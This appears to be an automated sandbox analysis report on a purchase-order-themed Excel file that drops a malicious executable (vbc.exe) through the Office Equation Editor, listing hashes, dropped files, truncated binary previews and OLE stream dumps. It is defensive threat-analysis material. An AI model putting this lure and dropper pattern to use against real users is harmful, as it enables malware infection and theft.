Preview:	L..................F.... .....K..3....K..3....Y0................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT.....&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT....._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2......V. .PO-112~1.XLS..N......hT..hT.....r.....'...............P.O.-.1.1.2.0.3.0.0.8.7...x.l.s.......z...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\PO-112030087.xls.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.1.1.2.0.3.0.0.8.7...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9P..N..... .....[D_....3N...W

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Generic INItialization configuration [xls]
Category:	modified
Size (bytes):	75
Entropy (8bit):	4.6849826107737185
Encrypted:	false
SSDEEP:	3:bDuMJlt7OYCmMZOYCv:bCmKYUQYs
MD5:	A93EE602C9ABCE3C662A64C7FDD6721A
SHA1:	08B0900DB4F29CCE74F8F5EB6052DF3A09D35559
SHA-256:	E014D8D37C03AA37D79341DBB6744DB68025B11D0A072C3CE76FAC673C8AE5EF
SHA-512:	57408D017F3B0A3DFDEAC217E30EFD2682A0CFB89DFCCB553A49E1B576E65F75215757F8B45FCD1AE32762F47BEAF9543D1CB924FDA373C8610919B350682930
Malicious:	false
Reputation:	unknown
Preview:	[folders]..Templates.LNK=0..PO-112030087.LNK=0..[xls]..PO-112030087.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.479760646202031
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyHoljpl0QelMWFlc2VbiVllln:vdsCkWt51p2tvHV6/l
MD5:	0ACDE4A3C820A366AC6C0AB821A72207
SHA1:	B6551E86B60D095E74D4F79B6B004D40FDA4BA72
SHA-256:	3F3701E84757747159396FB41AD88E0E51084F846EB8007A2FAEAC15CE9DBF2C
SHA-512:	CB974D0C6CFE9B9AF015DD9D92B8110FC9AFE7EEA9A8C03ECF9112F6EA642DBE5FE9531E39B5B52EAADE7FEBAF6C17E4DD92AF5841476BECEA8E8789E19C2FB0
Malicious:	false
Reputation:	unknown
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms

Download File

Process:	C:\Windows\explorer.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.24171333533996
Encrypted:	false
SSDEEP:	12:rl3b/+PFx2TP1dszCVu0VQ7kCcKiqtZIh/zTUTdJP9TdJPunw99TdJP9TdJP7GPd:rT1ZA0Vdh4igrNruwrNr7O
MD5:	7052BA1C5D7321AB52CF82D5C0DFF18E
SHA1:	DE64C8E3C8572821248CA235B8CFE8675EFE2525
SHA-256:	425C9FB4CDB17369F0B6552CD5B169D99108C1B86BC8F7D79E7830F48AFBA98B
SHA-512:	3E0F4B5C381421B3E73F2332C0CF82DFD0C156839D920259A3675A0A2467B667B7BE69D92916E4B121DDD9663CBAAF561668EF61698B425583DEF9A5772A2A03
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\6e855c85de07bc6a.automaticDestinations-ms

Download File

Process:	C:\Windows\explorer.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.5540087619073173
Encrypted:	false
SSDEEP:	12:rl3b/+PFI2Ta1dsjChl/ivL2EkUYaY5iCSJhIHis8Ih/zTUTdE5y/TdE51fwu5TN:rL1privLuDaZCSJHZigqA7q7qA7qvxE
MD5:	8F0D38FA10CD7107E18093E51D3C1F50
SHA1:	663FF885683D8F70C0CD350240E330CFAE5652FF
SHA-256:	944A87E11D411A2599A4BB7119C88BE0947614E8AE15AC612D84FA00AD7AB3A5
SHA-512:	60B7C8F55F5482CF2404C3431C245A3796AE88D8736E7A9C94685E832664A98F99537CAF1271D4725DF39313B23AA366FD15069457E97D7FC43AB512E8773BA2
Malicious:	false
Reputation:	unknown
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\PO-112030087.lnk

Download File

Process:	C:\Windows\explorer.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Tue May 16 18:55:22 2023, length=1421824, window=hide
Category:	dropped
Size (bytes):	576
Entropy (8bit):	4.626430223456706
Encrypted:	false
SSDEEP:	12:8GvL2E2LUYaY5iCSJBiKlE/FlTUTdE5y/TdE5X:8GvLoLDaZCSJQGEPUqA7qJ
MD5:	8FA092BDA1B898D02E7A143DA733B27E
SHA1:	E93942B3A30C1F083AB114A602CEC1232668B592
SHA-256:	83F29C81DA5964032CDBC0A4E0009FE3CCF66F9410E182C855E10F2F9C7066E9
SHA-512:	EDEC4A8383285A355FAEAAC01990B93C8A7C00B72620DD3C0DDF143F6B4940D303422EA8F23DCDF06F935EE8080AA91DD2244487ED55EF25B674C8F49FE139B4
Malicious:	false
Reputation:	unknown
Preview:	L..................F.. . .....K..3....K..3....Y0...........................l.j.2......V. .PO-112~1.XLS..N......hT..hT..*...r.....'...............P.O.-.1.1.2.0.3.0.0.8.7...x.l.s.......\|...............-...8...]..................C:\Users\..%...................\\user-PC\Users.user\Desktop\PO-112030087.xls.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.-.1.1.2.0.3.0.0.8.7...x.l.s...C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.e.s.k.t.o.p.(...........1SPS.XF.L8C....&.m.........`.......X.......user-pc........D_....3N...W...9P..N..... .....[D_....3N...W...9P..N..... .....[....

C:\Users\user\AppData\Roaming\rirjijj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1014136
Entropy (8bit):	6.269492701769548
Encrypted:	false
SSDEEP:	12288:yoHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD:yo0odC3lMHiEptXW+xVW8MeH
MD5:	BC8DFCB4093F0BB356E3103AF15F3D1B
SHA1:	25EC668FBF84DB1B01FA623382DA77FD53138833
SHA-256:	7F016599BC5B598D9BA9F8E869A36E0C128BC6BBCCFFB391B05993B62CA71BAA
SHA-512:	16EBDBA2C60D11EFF09BEE5CF1DFCD4D9C726952185766B9497A8F177F239CAE2EDF90F629A3FF51E2AC88B6E7E7300D43359074A906F7D282B4B28465CDF79D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....qbd.................p...................................................................................................l..P.......H............`..x............................................................................................text....c.......p.................. ..`.data....$..........................@....rsrc...H...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\swwtrfg

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	339146
Entropy (8bit):	7.999495571635535
Encrypted:	true
SSDEEP:	6144:WyZjTb2D/ifB85NOLwWUCU8JxJq/ZORYj4wD0Ht6kOW87dfWMjWLarl7k:lVTSDiJeOLw95SYj4wDwkkOWW7k
MD5:	3D9D8FA4FF97EF060632CD2337BA239B
SHA1:	7193E0223084AFE8E0990A28AA968124D214F996
SHA-256:	7B581CBC6AFC500B37025220647508351B0DF659A72ECE0B3D6AA77EB37709B5
SHA-512:	D7DC075993EF5245AA11697262ED30D4A40DF9DD6FCB5D3D3EE1CEAE0C969CCC8F5E857426BD6442C4578AF96C8414699AC4DFB6748CD1B704A72B6DB1316EB8
Malicious:	false
Reputation:	unknown
Preview:	.>-.iw.:.. .;(....]..~..p.]....$..=.-./2.Q..PjDQ.Yx..........qW...$.xx.Y....{>..N.....n0V..\|cK.f._V=...]....Y..)...,..ms;J.s......#n7..1.$.......k%.......B=....ZNBmdaI.D..3h..B6....&F.E<../...E....#..&.v.Z..n..W.........EC..Je..v...,Wo...8.,...QB...C;.-.y=o.......5..J.p.S...t...S.P.].E...].T.q..7.:...).We.....W#...i..E,...r...+....O.....H=CY...<n...s.R...'..%..L..0...1\.\|.k..\.+."B.v+...X.Tm......R.sv-"..<.%..Hj.B....<..../`[0..t...t....`..\.m....%.i.F#5.:?.}=<b,V..!H.I...j....#....g.........)..R...n8.3..#.H..ih..d"t.=........!BY...P.n...K.\.[.x..e=.;."7.-VD..lj..5P5w.?.G...6.....-.y...gq\...AR...i.6.q..~d&&u.Y.....#O.,.&!.^......08.kU{.\|....j.....sV.b....X..G..O.C..A.$.n...p....\|.o.N....A..<..<.$.W.!F......w...\|E .9......GjT....r....g.`.Dt\...lBK."...hc[..X.Q....O....'.......N..g.8.......d.9..7...d_q.TI.......n..._....l....;U.L.!Kl ..Az...s{Kx#..yv..(.8.$3&...8.8Y..c..-.B...P..P,.<...vP..;..Yy.N.~...?.....d./rm.ZP...

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1014136
Entropy (8bit):	6.269492701769548
Encrypted:	false
SSDEEP:	12288:yoHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD:yo0odC3lMHiEptXW+xVW8MeH
MD5:	BC8DFCB4093F0BB356E3103AF15F3D1B
SHA1:	25EC668FBF84DB1B01FA623382DA77FD53138833
SHA-256:	7F016599BC5B598D9BA9F8E869A36E0C128BC6BBCCFFB391B05993B62CA71BAA
SHA-512:	16EBDBA2C60D11EFF09BEE5CF1DFCD4D9C726952185766B9497A8F177F239CAE2EDF90F629A3FF51E2AC88B6E7E7300D43359074A906F7D282B4B28465CDF79D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 36%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....qbd.................p...................................................................................................l..P.......H............`..x............................................................................................text....c.......p.................. ..`.data....$..........................@....rsrc...H...........................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 15 19:07:46 2023, Security: 0
Entropy (8bit):	7.635007554690318
TrID:	Microsoft Excel sheet (30009/1) 36.81% Microsoft Excel sheet (alternate) (24509/1) 30.06% Microsoft Word document (old ver.) (19008/1) 23.31% Generic OLE2 / Multistream Compound File (8008/1) 9.82%
File name:	PO-112030087.xls
File size:	1421824
MD5:	86e893d59d327a8428587fefd183afdc
SHA1:	481bd3469621bf1ce7213641465d23739296ad4c
SHA256:	fbbeeb61e58f001c80e1566d80d2a0defdbdb558f5d11f745b66d25dd241302e
SHA512:	1835696222762c60e61de93bcf00947f7683f6e55f9168a4a53d04998f7299d93a4382dd2cd879402244bb15100317e29ebcc5184bfc75005254c505ddb1b091
SSDEEP:	24576:XLKU/EDLwBkL7/yDLwBkKN+MXUV+MXUpNsMQZWR1isyq/n6Xef/1nS:XLKGzmxH+MX6+MXCNsnZW1VNyEn
TLSH:	C6650112E985AD5EC64507B12B8B7888631DBE72BAC41A43375CB74E1FF3AA4E543C0D
File Content Preview:	........................>.......................................................................,...-...`...............\|.......~...............b.......d......................................................................................................

File Icon


Icon Hash:	276ea3a6a6b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "PO-112030087.xls"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2023-05-15 18:07:46
Thumbnail:	ZO!c-!c-!A c(>>A'>A'>A'Rd'>AxxUUC2jjUCUC5UUnJUN2x.jC5UUUU#.Y5Cd'>dx2UxUU@#Q2UU2Nx2..j5nj\5UgQcUUUUNNj#jx25n2\UY#@jUU#UcA'>AR'2Uc@Uj@GY2UU2Nx2U2j\.UxUxU@U'UUNN#jx2x25UCJ\j@2U>AR>A'A'2U\UnC2CCUU#UcAxARU2UUU.jCC.JCcAxAR>A'>A'>A'RAR>RA'>dxd'>dx'>A'>A'>A'>A'A'>AR>A'>A'x>dxcARAR>xAR>AxxcdR>AR>A'>A''Ax>'>>A'>A'A'>Ax>A'>A'A'A'cAxA'>d>A'>A'>A'x>dx>dx>d>A'>A'>A''>x>x>A'>A'>A'>A'>A'RAR>xUU9UU\2cU~;,xqF,J]xUq2x(q(qx2Oq,DGU2UUcR>xU4P9P@UUTY-<)"(GJ#U!2FTkx-"OgUT2dx7UU2xUUx2U%]MRiC#-2LPUUcd>x{ y{YUgxtcUU}\2;z,\\U%x@\|jw)3U2,x33x2`$GI34xFUdR>xxk{ $8[k7%:7)02?]:\\bBB"cI[ILAQA q3~c)LqFIGqBFBqLGIq2PGBW]9@jcc>A'xRRTVWXX[Z\^^aeJqqqtwUSX[Z\^^aadkB=qqruwx{}"7Z\^^aadde{6W-GUC====[J&',.18tYaddfggiUU(qx2qUU(q2qU@qq&SU~3\U92U[Z(;cUU2zt;C<jU2UUq2xqUU,6xZ,o^F,;,xx&:Gr2UUUUUU?~T2l=====dfggikjUUUx2UUUU2UUUvS-xNQiL4z-~GU9C{tjFuU92A4N/xU/q]] \.NxGU}P!9/Uq%22xUUUABx"OTvd1FTk2x-!cWgun,7qUUUn9G\|\9UP======xggikk~CU3x2_$CU32,U3:spzfcxtsnU2\qzzqnxQosU'%N7TF2xwFU3xaVV%x@\W3Nx&`^2U#jnq]qxpTA======gikkmrjf)@FBqLGIqjf)@LGIqd',27d:i9#2A:\MqkOLLqFIGBjc)3q9w[QA"c8+^a;0OqJmO3<[q@!ccA\|=============>=======nmnqA>===================mnqAnAt=================nqp>d>A'>A'A'AAAADZ~g===========~qpQ<D='A'AAmABAps2U2UU}j\m%hfVx(qUUcU2UcU?F(2x(qhf2qAU}2cAxAAAAAAWADAHoqs29U2UUUj[V(#?x0BTxUUUc%3LJP!UcGJ#U!2M2xUx0B'OOpU7UUCcd'AAAAAAAAAAAAAAAAAAs)AUU2UU}ZZUx3l[x'\|]FU4x,F;z,2,xw9x3UxC%U}WAc>A'>A''ZAxAAqAAAAss]a,\BLBhD%@T']2qLBs3w3FIGqB9@jcFW]BBj\bBBLqFIGqBs3w3FQFLLQiD%@T}Tq^>RICCMAAAAAAsdxc'rIONPAAAAAAEHAArc>A'>A'cA'[[[[gRVo%p&n&o%o%o%{7\|m%MJ{SS:GkUS(;cfU}G2NjS;2UUUUUUUNN@?<q/:UUU@NUU2#UUUUUUU9UUU2UF\|,\|+\|+\|+\|,\|,\|,\|,\|,\|,{+\|{+{{+UVY=-U)2?AU#U0ks34-!PU@2B^vj#@GTHHUqS&qML^qQ !DbHGTL4x}N/xSNDsz9G\U#&#~AHG3xP9P@UJH.NxG\////.//00/UFU\U}x&2U q\\|zccJe%8Fdl,biznacxmx{jk-]^}ndqzzqqk]Ux2(-VMdgxtcUa-^Qos&nV/d) 2?A-dNG&#@\9=ouOH3[#O;\q\#cOcccd##Ai*B:>AR>A'>A'>A'A'>'cd'c'>dxcRdx>dR>A'>A'd'>>A'>A'>A'cA'>x>x>x>x>x>'>x>A'x>RcAx>d>A'>A'>A'R>d>A'>A'A'>d>A'>A'>A''d'd'cd>Axx>d'Rcd>d'>Ax>A'>A'>A'>A'Rcd>RARcdcAxcRcAxcd>Axxd'cd>xdR'>d>A'>A'>A'Rd'cd>Rcd>dxcdd'ARcd>AxxcRARcdAR>'Rcd>dd'>Ax'>d>A'>A'>A'R>>A'>A'd'>d>A'>A'>A''
Creating Application:
Security:	0

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h z \\ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 68 7a 5c f2 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h z f . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 68 7a 8d 66 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h z . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 68 7a c7 1c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 464

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	464
Entropy:	3.2507502228171012
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 08 01 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00

Stream Path: \x5SummaryInformation, File Type: dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", Stream Size: 120200

General
Stream Path:	\x5SummaryInformation
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
Stream Size:	120200
Entropy:	1.268130564248483
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . X . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . & X . . . . . . . . . G . . . . . . . . . . . Z . . . . . . . . . . O . . . . ! . . . . . . . . . . . c . . . . . . . . . . . . . . . - . . . . . . . . . ! . . . c
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 58 d5 01 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 11 00 00 00 a0 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: MBD018A264D/\x1CompObj, File Type: data, Stream Size: 140

General
Stream Path:	MBD018A264D/\x1CompObj
File Type:	data
Stream Size:	140
Entropy:	4.917037463761096
Base64 Encoded:	False
Data ASCII:	. . . . . . k k . ? / + N . R c . - " - . . . M i c r o s o f t O f f i c e W o r d M a c r o - E n a b l e d D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t M a c r o E n a b l e d . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 6b 6b a0 18 3f 2f 2b 4e a6 11 52 be 63 1b 2d 22 2d 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 57 6f 72 64 20 4d 61 63 72 6f 2d 45 6e 61 62 6c 65 64 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 1d 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 4d 61 63 72 6f 45 6e 61 62 6c 65 64 2e 31 32 00 f4 39 b2 71

Stream Path: MBD018A264D/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD018A264D/\x1Ole
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 5 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 35 00

Stream Path: MBD018A264D/Package, File Type: Microsoft Word 2007+, Stream Size: 66142

General
Stream Path:	MBD018A264D/Package
File Type:	Microsoft Word 2007+
Stream Size:	66142
Entropy:	7.669317647447264
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . i . . . : . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
